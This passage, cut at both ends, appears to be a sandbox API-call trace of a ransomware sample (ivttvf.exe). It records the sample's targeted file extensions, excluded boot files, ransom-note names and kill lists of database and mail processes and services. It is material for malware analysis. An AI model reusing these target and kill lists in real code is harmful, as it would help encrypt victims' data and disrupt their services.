lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0031.060] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cd438 | out: hHeap=0x570000) returned 1 [0031.060] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa178, Size=0x82) returned 0x5bb9b0 [0031.060] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa198, Size=0x100) returned 0x5bba40 [0031.060] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bb9b0, Size=0x104) returned 0x5bbc68 [0031.060] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bba40, Size=0x200) returned 0x5bbd78 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa188 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bbd78 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb5c8 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb5e8 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be000 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb670 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be030 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bbc68 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be018 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bbb48 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb5e0 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bbbd8 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb5f8 | out: hHeap=0x570000) returned 1 [0031.061] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5be018, Size=0x20) returned 0x5a5980 [0031.061] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5980, Size=0x40) returned 0x5a6ac8 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa158 | out: hHeap=0x570000) returned 1 [0031.061] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdfa0 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb520 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdfd0 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb560 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdfb8 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa168 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdfe8 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7ec8 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a6000 | out: hHeap=0x570000) returned 1 [0031.062] lstrlenW (lpString="%systemdrive%") returned 13 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5958 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0031.062] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa138 | out: hHeap=0x570000) returned 1 [0031.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x5ab428, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bdfe8, Size=0x20) returned 0x5a5980 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5980, Size=0x40) returned 0x5a6b10 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6b10, Size=0x80) returned 0x5cb450 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5bb9b0 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bb9b0, Size=0x200) returned 0x5bb9b0 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bb9b0, Size=0x400) returned 0x5bb9b0 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bb9b0, Size=0x800) returned 0x5bb9b0 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bb9b0, Size=0x1000) returned 0x5c0060 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa138, Size=0x8) returned 0x5aa158 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa158, Size=0x10) returned 0x5be000 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5be000, Size=0x20) returned 0x5a5980 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5980, Size=0x40) returned 0x5a6b10 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6b10, Size=0x80) returned 0x5cb450 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5c1080 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c1080, Size=0x200) returned 0x5bbdb0 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bbdb0, Size=0x400) returned 0x5c3068 [0031.063] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c3068, Size=0x800) returned 0x5c4070 [0031.063] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.063] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0060 | out: hHeap=0x570000) returned 1 [0031.064] lstrlenW (lpString="") returned 0 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c4ef0 | out: hHeap=0x570000) returned 1 [0031.064] lstrlenW (lpString=".dqb") returned 4 [0031.064] lstrlenW (lpString=".dqb") returned 4 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c4ef0 | out: hHeap=0x570000) returned 1 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f20, Size=0x20) returned 0x5a5980 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5980, Size=0x40) returned 0x5a6b10 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6b10, Size=0x80) returned 0x5cb450 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2d8, Size=0x8) returned 0x5aa2e8 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2e8, Size=0x10) returned 0x5c4f20 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f20, Size=0x20) returned 0x5a59d0 [0031.064] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f50, Size=0x20) returned 0x5a59f8 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a59f8, Size=0x40) returned 0x5a6b10 [0031.064] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.064] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a6b10 | out: hHeap=0x570000) returned 1 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f50, Size=0x20) returned 0x5a59f8 [0031.064] lstrlenW (lpString="Info.hta") returned 8 [0031.064] lstrlenW (lpString="Info.hta") returned 8 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a59f8 | out: hHeap=0x570000) returned 1 [0031.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5ed460, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe")) returned 0x30 [0031.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ed460 | out: hHeap=0x570000) returned 1 [0031.064] lstrlenW (lpString="ivttvf.exe") returned 10 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a59d0, Size=0x40) returned 0x5a6b10 [0031.064] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f50, Size=0x20) returned 0x5a59d0 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f50, Size=0x20) returned 0x5a59f8 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a59f8, Size=0x40) returned 0x5a6b58 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6b58, Size=0x80) returned 0x5cb450 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5c1080 [0031.065] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c1080 | out: hHeap=0x570000) returned 1 [0031.065] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x5ed460, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5fd468 | out: hHeap=0x570000) returned 1 [0031.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ed460 | out: hHeap=0x570000) returned 1 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2e8, Size=0x8) returned 0x5aa2d8 [0031.065] lstrlenW (lpString="%windir%;") returned 9 [0031.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a59d0 | out: hHeap=0x570000) returned 1 [0031.065] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.065] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd458 | out: hHeap=0x570000) returned 1 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4f68, Size=0x20) returned 0x5a59d0 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a59d0, Size=0x40) returned 0x5a6b58 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6b58, Size=0x80) returned 0x5cb450 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5c1080 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa318, Size=0x8) returned 0x5aa328 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa328, Size=0x10) returned 0x5c4fb0 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c4fb0, Size=0x20) returned 0x5a59d0 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2e8, Size=0x8) returned 0x5aa328 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2f8, Size=0x8) returned 0x5aa2e8 [0031.065] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa318, Size=0x8) returned 0x5aa338 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa338, Size=0x10) returned 0x5c5058 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c5058, Size=0x20) returned 0x5a59f8 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa328, Size=0x10) returned 0x5c5058 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa2e8, Size=0x10) returned 0x5c0090 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa328, Size=0x8) returned 0x5aa318 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa348, Size=0x8) returned 0x5aa358 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c5058, Size=0x20) returned 0x5a5a20 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0090, Size=0x20) returned 0x5a5a48 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa368, Size=0x8) returned 0x5aa378 [0031.067] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.067] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c1080 | out: hHeap=0x570000) returned 1 [0031.067] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0120, Size=0x20) returned 0x5a5a98 [0031.067] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x5dd458, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0031.067] lstrlenW (lpString="C:\\") returned 3 [0031.068] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0031.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd458 | out: hHeap=0x570000) returned 1 [0031.068] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c3080, Size=0x82) returned 0x5bbe88 [0031.068] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c30a0, Size=0x100) returned 0x5c1080 [0031.068] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5bbe88, Size=0x104) returned 0x5c08f0 [0031.068] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c1080, Size=0x200) returned 0x5c5090 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c3090 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c5090 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c01c8 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb670 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0180 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb5e8 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c01b0 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c08f0 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0198 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bbf18 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c01e0 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0860 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c01f8 | out: hHeap=0x570000) returned 1 [0031.069] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c01f8, Size=0x20) returned 0x5a5ac0 [0031.069] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5ac0, Size=0x40) returned 0x5a6b58 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa388 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0120 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bc3b8 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0150 | out: hHeap=0x570000) returned 1 [0031.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb560 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0138 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa398 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c0168 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bb560 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a6120 | out: hHeap=0x570000) returned 1 [0031.070] lstrlenW (lpString="%systemdrive%") returned 13 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5a98 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0031.070] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aa368 | out: hHeap=0x570000) returned 1 [0031.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x5cd438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0031.070] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5a7c28*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa98 Thread: id = 4 os_tid = 0xaa4 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0168 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0168, Size=0x20) returned 0x5a5ac0 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5ac0, Size=0x40) returned 0x5a6ba0 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6ba0, Size=0x80) returned 0x5cb450 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5c1080 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0168 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0168, Size=0x20) returned 0x5a5ac0 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5ac0, Size=0x40) returned 0x5a6ba0 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6ba0, Size=0x80) returned 0x5cb450 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5c1188 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5c0168 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5aa368 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0138 [0031.701] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa368, Size=0x8) returned 0x5aa398 [0031.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5a6140 [0031.702] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa398, Size=0x10) returned 0x5c0150 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x5a6160 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1a) returned 0x5a5ac0 [0031.702] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0150, Size=0x20) returned 0x5a5ae8 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c) returned 0x5a5b10 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x16) returned 0x5a6180 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1a) returned 0x5a5b38 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x5c0150 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x5aa398 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x5a6ba0 [0031.702] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa398, Size=0x8) returned 0x5aa368 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3c) returned 0x5a6be8 [0031.702] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5aa368, Size=0x10) returned 0x5c0120 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x14) returned 0x5a61a0 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x5a61c0 [0031.702] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0120, Size=0x20) returned 0x5a5b60 [0031.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x5bc3b8 [0031.702] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0031.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c1080 | out: hHeap=0x570000) returned 1 [0031.702] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0031.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c1188 | out: hHeap=0x570000) returned 1 [0031.702] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5a5c00 [0031.702] EnumServicesStatusExW (in: hSCManager=0x5a5c00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0031.703] GetLastError () returned 0xea [0031.703] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x5de498 [0031.703] EnumServicesStatusExW (in: hSCManager=0x5a5c00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5de498, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5de498, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0031.703] CloseServiceHandle (hSCObject=0x5a5c00) returned 1 [0031.704] lstrlenW (lpString="Appinfo") returned 7 [0031.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0031.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0031.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0031.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0031.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0031.704] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0031.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.704] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0031.704] lstrcmpiW (lpString1="mssqlserver", 